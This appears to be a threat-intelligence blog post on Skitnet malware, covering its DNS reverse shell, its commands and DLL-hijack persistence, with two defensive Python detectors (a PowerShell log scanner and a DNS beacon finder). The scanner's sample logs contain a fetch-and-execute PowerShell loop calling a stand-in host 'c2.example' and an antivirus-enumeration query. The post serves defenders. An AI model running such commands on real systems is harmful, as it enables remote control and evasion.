Skitnet: A New Era in Ransomware Tools


Alex Cipher · 5 min read

Skitnet, also known as “Bossnet,” has emerged as a formidable tool in the arsenal of ransomware gangs, offering a blend of stealth and versatility that has captured the attention of cybercriminals worldwide. Initially surfacing on underground forums like RAMP in April 2024, Skitnet quickly gained traction among notorious groups such as BlackBasta and Cactus by early 2025. These groups have leveraged Skitnet’s capabilities in phishing attacks targeting enterprise platforms like Microsoft Teams, as detailed by Prodaft researchers. The malware’s sophisticated architecture, which includes a Rust-based loader and a ChaCha20-encrypted Nim binary, allows it to establish a robust communication channel with its command-and-control server, making it a potent tool for post-exploitation activities.

Skitnet: An Overview

Development and Deployment

Skitnet, also known as “Bossnet,” is a sophisticated post-exploitation malware increasingly adopted by ransomware gangs for its stealthy and versatile capabilities. Initially offered for sale on underground forums like RAMP in April 2024, Skitnet gained significant traction among cybercriminals by early 2025. According to Prodaft researchers, it has been deployed in real-world attacks by multiple ransomware operations, including BlackBasta and Cactus. These groups have utilized Skitnet in phishing attacks, notably targeting enterprise platforms such as Microsoft Teams.

Technical Architecture

Skitnet’s infection chain begins with a Rust-based loader that decrypts a ChaCha20-encrypted Nim binary and loads it into the target system’s memory. This Nim payload establishes a DNS-based reverse shell for communication with the command-and-control (C2) server. The malware initiates the session with randomized DNS queries, creating a robust and stealthy communication channel. It operates three concurrent threads: one sends heartbeat DNS requests, another monitors and exfiltrates shell output, and a third listens for and decrypts commands carried in DNS responses. Commands and communications are sent via HTTP or DNS, depending on instructions issued through the Skitnet C2 control panel.

Command Capabilities

Skitnet’s admin panel supports a range of commands, enabling extensive control over compromised systems. Key functionalities include:

  • Startup: Establishes persistence by downloading three files, including a malicious DLL, and creating a shortcut to a legitimate Asus executable (ISP.exe) in the Startup folder. This action triggers a DLL hijack, executing a PowerShell script (pas.ps1) for ongoing C2 communication.

  • Screen: Captures screenshots of the victim’s desktop using PowerShell, uploads them to Imgur, and sends the image URL back to the C2 server.

  • Anydesk and Rutserv: Downloads and silently installs AnyDesk and RUT-Serv, both legitimate remote access tools, while concealing their presence by hiding windows and notification tray icons.

  • Shell: Initiates a PowerShell command loop, sending an initial “Shell started..” message. It then polls the server every five seconds for new commands, executing them using Invoke-Expression and sending results back.

  • Av: Enumerates installed antivirus and security software by querying WMI (SELECT * FROM AntiVirusProduct in the root\SecurityCenter2 namespace) and sends results to the C2 server.

These capabilities make Skitnet a powerful tool for maintaining control over compromised systems, facilitating data exfiltration, and executing further malicious activities.
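Several of the commands above leave distinctive traces in PowerShell Script Block Logging (Event ID 4104): the WMI AntiVirusProduct query, a sleep-and-Invoke-Expression polling loop, an Imgur upload and the ISP.exe/pas.ps1 persistence chain. The scanner below is an added example written for this page, not Prodaft's or the article's code. It runs a small rule set over constructed script-block log entries; the event IDs, the sample script text (including the `c2.example` host) and the rule names are assumptions, while the strings the rules look for are the ones the article describes.

```python
"""Scan PowerShell script-block log text for the Skitnet behaviours described above.

Added example, not code from the article or from Prodaft. The sample entries
are constructed to resemble PowerShell Script Block Logging (Event ID 4104)
text; rule names, event IDs and the c2.example host are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    description: str


# Rule strings come from the behaviours the article lists for each command.
RULES = [
    Rule(
        "av_enumeration",
        re.compile(r"root\\SecurityCenter2.*?AntiVirusProduct"
                   r"|AntiVirusProduct.*?root\\SecurityCenter2", re.I | re.S),
        "WMI query for installed security products (Av command)",
    ),
    Rule(
        "iex_polling_loop",
        re.compile(r"(Invoke-Expression|\biex\b).*?Start-Sleep"
                   r"|Start-Sleep.*?(Invoke-Expression|\biex\b)", re.I | re.S),
        "Sleep loop that executes fetched text with Invoke-Expression (Shell command)",
    ),
    Rule(
        "imgur_upload",
        re.compile(r"imgur\.com", re.I),
        "Screenshot upload to Imgur (Screen command)",
    ),
    Rule(
        "startup_isp_dll_hijack",
        re.compile(r"ISP\.exe|pas\.ps1", re.I),
        "Startup shortcut to ISP.exe / pas.ps1 DLL-hijack chain (Startup command)",
    ),
]

# Constructed sample log: event id -> script block text. evt-3 is benign.
SAMPLE_SCRIPT_BLOCKS = {
    "evt-1": "Get-WmiObject -Namespace root\\SecurityCenter2 "
             "-Query 'SELECT * FROM AntiVirusProduct' | Select-Object displayName",
    "evt-2": "while($true){ $c = (iwr 'http://c2.example/cmd').Content; "
             "iex $c; Start-Sleep -Seconds 5 }",
    "evt-3": "Get-ChildItem C:\\Users | Measure-Object",
    "evt-4": "$lnk.TargetPath = 'C:\\ProgramData\\ISP.exe'; $lnk.Save()",
    "evt-5": "$r = Invoke-RestMethod -Uri 'https://api.imgur.com/3/image' "
             "-Method Post -Headers $h -Body $b",
}


def scan_script_block(text: str) -> list:
    """Return the names of all rules that match one script block."""
    return [rule.name for rule in RULES if rule.pattern.search(text)]


def scan_log(entries: dict) -> dict:
    """Map event id -> matched rule names, keeping only entries with a hit."""
    findings = {}
    for event_id, text in entries.items():
        hits = scan_script_block(text)
        if hits:
            findings[event_id] = hits
    return findings


if __name__ == "__main__":
    for event_id, hits in scan_log(SAMPLE_SCRIPT_BLOCKS).items():
        print(event_id, hits)
```

Regex rules of this kind are a starting point for a hunt, not a signature: an operator can rename ISP.exe or pas.ps1, so the higher-value rules are the behavioural ones (a security-product enumeration query, a sleep loop that feeds fetched content to Invoke-Expression) and they should be paired with the network-side checks described under mitigation.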

Skitnet’s .NET Loader

Beyond its core command set, Skitnet operators can leverage a separate capability involving a .NET loader. This feature allows the execution of PowerShell scripts in memory, providing even deeper attack customization. The use of a .NET loader enhances Skitnet’s versatility, enabling attackers to tailor their operations to specific targets and objectives.

Economic and Strategic Advantages

Skitnet offers several economic and strategic advantages to ransomware gangs. Custom tools tailored to specific operations are costly to develop and require skilled developers, who may not always be available, especially in lower-tier groups. In contrast, using off-the-shelf malware like Skitnet is cheaper, quicker to deploy, and complicates attribution, because many threat actors use it. This makes Skitnet particularly enticing for hackers seeking to maximize operational efficiency and minimize costs.

Indicators of Compromise (IoCs) and Mitigation

Prodaft has published indicators of compromise (IoCs) associated with Skitnet on its GitHub repository. These IoCs are crucial for cybersecurity professionals seeking to detect and mitigate Skitnet infections. Organizations are advised to monitor network traffic for unusual DNS queries, implement robust endpoint detection and response (EDR) solutions, and conduct regular security audits to identify potential vulnerabilities.
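The advice to monitor for unusual DNS queries can be made concrete. The Technical Architecture section describes a session opened with randomized DNS queries and a thread that sends heartbeat requests at a steady cadence; both properties are measurable in a resolver log. The script below is an added example, not Prodaft's or the article's code, and it generalizes beyond Skitnet to any DNS beacon: it groups queries by client and registered domain, scores the leading label's Shannon entropy (random-looking labels) and the regularity of inter-query intervals (heartbeats). The log format (`<epoch> <client-ip> <qname>`), the `cdn-update.example` domain, the addresses and the thresholds are all assumptions.

```python
"""Flag DNS query patterns consistent with a DNS reverse shell / heartbeat.

Added example, not code from the article or from Prodaft. It reads
constructed resolver-log lines of the form `<epoch> <client-ip> <qname>`;
the domain names, client addresses and thresholds are assumptions.
"""
import math
import statistics
from collections import defaultdict

# Constructed sample log: client 10.0.0.5 sends a random-looking label to one
# domain every 5 seconds; client 10.0.0.7 performs ordinary lookups.
SAMPLE_DNS_LOG = """\
1700000000 10.0.0.5 q7xk2m9fzp3a.cdn-update.example
1700000005 10.0.0.5 b3n8wq1tzr5k.cdn-update.example
1700000010 10.0.0.5 zp9l4m2xv7qa.cdn-update.example
1700000015 10.0.0.5 k2r8t5wq1nbx.cdn-update.example
1700000020 10.0.0.5 m4v1z9p2xq7c.cdn-update.example
1700000025 10.0.0.5 r8b3n6wl2tqz.cdn-update.example
1700000001 10.0.0.7 www.example.com
1700000130 10.0.0.7 mail.example.com
1700000470 10.0.0.7 www.example.com
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s; 0.0 for empty or single-symbol input."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text: str) -> list:
    """Parse `<epoch> <client> <qname>` lines into (epoch, client, qname) tuples."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, client, qname = line.split()
        records.append((int(ts), client, qname.lower().rstrip(".")))
    return records


def registered_domain(qname: str) -> str:
    """Last two labels. Simplification: a real deployment uses the public suffix list."""
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def analyse(records: list, min_queries: int = 5,
            entropy_threshold: float = 3.0, max_jitter: float = 0.2) -> dict:
    """Return {(client, domain): finding} for groups that look like a beacon.

    A group is reported when its leading labels have high mean entropy
    (randomized queries) or its inter-query intervals are regular (heartbeat).
    """
    groups = defaultdict(list)
    for ts, client, qname in records:
        groups[(client, registered_domain(qname))].append((ts, qname))

    findings = {}
    for (client, domain), items in groups.items():
        items.sort()
        if len(items) < min_queries:
            continue
        leading = [q.split(".")[0] for _, q in items]
        mean_entropy = statistics.fmean([shannon_entropy(lbl) for lbl in leading])
        intervals = [b[0] - a[0] for a, b in zip(items, items[1:])]
        mean_interval = statistics.fmean(intervals)
        # Coefficient of variation of the interval: 0 means perfectly periodic.
        jitter = (statistics.pstdev(intervals) / mean_interval
                  if mean_interval > 0 else float("inf"))
        reasons = []
        if mean_entropy >= entropy_threshold:
            reasons.append("high-entropy labels")
        if jitter <= max_jitter:
            reasons.append(f"regular ~{mean_interval:.0f}s interval")
        if reasons:
            findings[(client, domain)] = {
                "queries": len(items),
                "mean_label_entropy": round(mean_entropy, 2),
                "mean_interval_s": mean_interval,
                "reasons": reasons,
            }
    return findings


if __name__ == "__main__":
    for key, finding in analyse(parse_log(SAMPLE_DNS_LOG)).items():
        print(key, finding)
```

Two caveats a practitioner should keep in mind. Periodic lookups are not malicious by themselves (update checkers and monitoring agents beacon too), so the interval signal is best treated as a trigger for triage of the queried domain rather than a verdict, and the entropy signal is only meaningful against a whitelist of CDN and telemetry domains that legitimately use random-looking labels. The `registered_domain` helper also truncates to two labels, which misclassifies names under multi-label suffixes such as `co.uk`; production code should use a public suffix list.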

Ransomware Gangs and Skitnet

The adoption of Skitnet by ransomware gangs highlights its effectiveness as a post-exploitation tool. Groups like BlackBasta have utilized it in phishing attacks against enterprise platforms, demonstrating its utility in real-world scenarios. Skitnet’s ability to establish persistence, capture sensitive information, and facilitate remote access makes it a valuable asset for cybercriminals seeking to maximize the impact of their attacks.

Future Implications

The emergence of Skitnet marks a significant shift in the landscape of ransomware and post-exploitation tools. As cybercriminals continue to refine their tactics, techniques, and procedures (TTPs), organizations must remain vigilant and proactive in their cybersecurity efforts. The development and deployment of sophisticated malware like Skitnet highlight the need for continuous monitoring, threat intelligence sharing, and collaboration among cybersecurity professionals to effectively combat emerging threats.

In conclusion, Skitnet represents a significant advancement in post-exploitation malware, offering ransomware gangs a versatile and stealthy tool for maintaining control over compromised systems. Its adoption by prominent cybercriminal groups underscores its effectiveness and highlights the ongoing challenges faced by organizations in defending against sophisticated cyber threats.

Final Thoughts

The development of Skitnet underscores the dynamic and evolving nature of cyber threats. As ransomware gangs continue to refine their tactics, tools like Skitnet highlight the ongoing challenges faced by organizations in defending against sophisticated cyber threats. Its adoption by prominent cybercriminal groups such as BlackBasta demonstrates its effectiveness in real-world scenarios, emphasizing the need for continuous monitoring and proactive cybersecurity measures. The development of Skitnet and similar tools calls for enhanced collaboration among cybersecurity professionals to effectively combat these emerging threats. For more insights, refer to the detailed analysis by Prodaft researchers.

References

  • Prodaft researchers. (2025). Ransomware gangs increasingly use Skitnet post-exploitation malware. BleepingComputer.